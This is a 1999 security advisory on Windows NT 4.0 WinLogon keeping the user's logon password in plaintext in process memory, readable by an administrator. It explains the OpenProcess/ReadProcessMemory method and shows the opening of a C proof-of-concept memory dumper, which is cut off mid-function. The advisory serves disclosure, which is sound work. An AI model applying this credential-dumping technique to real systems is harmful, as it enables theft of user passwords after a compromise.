NT WinLogon VM contains plaintext password visible in admin mode
7 Dec. 1999
Summary
WinLogon's process contains the password used to logon to the NT station in plaintext.
While this exploit does require administrative rights for it to work, the implications of social engineering or an exploit to run after compromising the administrative account are obvious. This works on NT 4.0 with Service Pack 4 or below. Service Pack 5 corrects this behavior (it blocks access to the first 10K of the WinLogon memory space).
Credit:
This information has been provided by: Robert Horvick.
The basic idea is that if WinLogon's process is opened (OpenProcess) with PROCESS_VM_READ and then the VM is read with ReadProcessMemory - within the first several hundred bytes (in the form of Unicode environment variables) is the logged in users password - twice - in plaintext in an easy to parse format.
Here is some code to demonstrate this - you must be running as administrator for this to work:
/***************************************************************
* dumpvmem
*
* dumps the contents of a process virtual mem to a file for
* browsing later. If run with admin privs and the process
* winlogon is used ... the users password is all over the
* place in the first few hundred bytes.
*
* Robert Horvick [Kanin] Great Plains Software
* 12/2/1999 rhorvick@acm.org
*
*
* Command Line
* pid - decimal process id
* szPath - path to the file to dump memory to
*
****************************************************************/
#include <windows.h>
#include <stdio.h>
/*
* Highly inefficient - allocations occur in page size minimums.
* They should be used for real work. Since
* the password shows up so quickly ... meh.
*/
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
LPSTR lpOffset = (void*)1;
CHAR vBuf[1];
DWORD dwRead = 0;
BOOL bLastRead = FALSE;
DWORD dwDumpedBytes = 0;
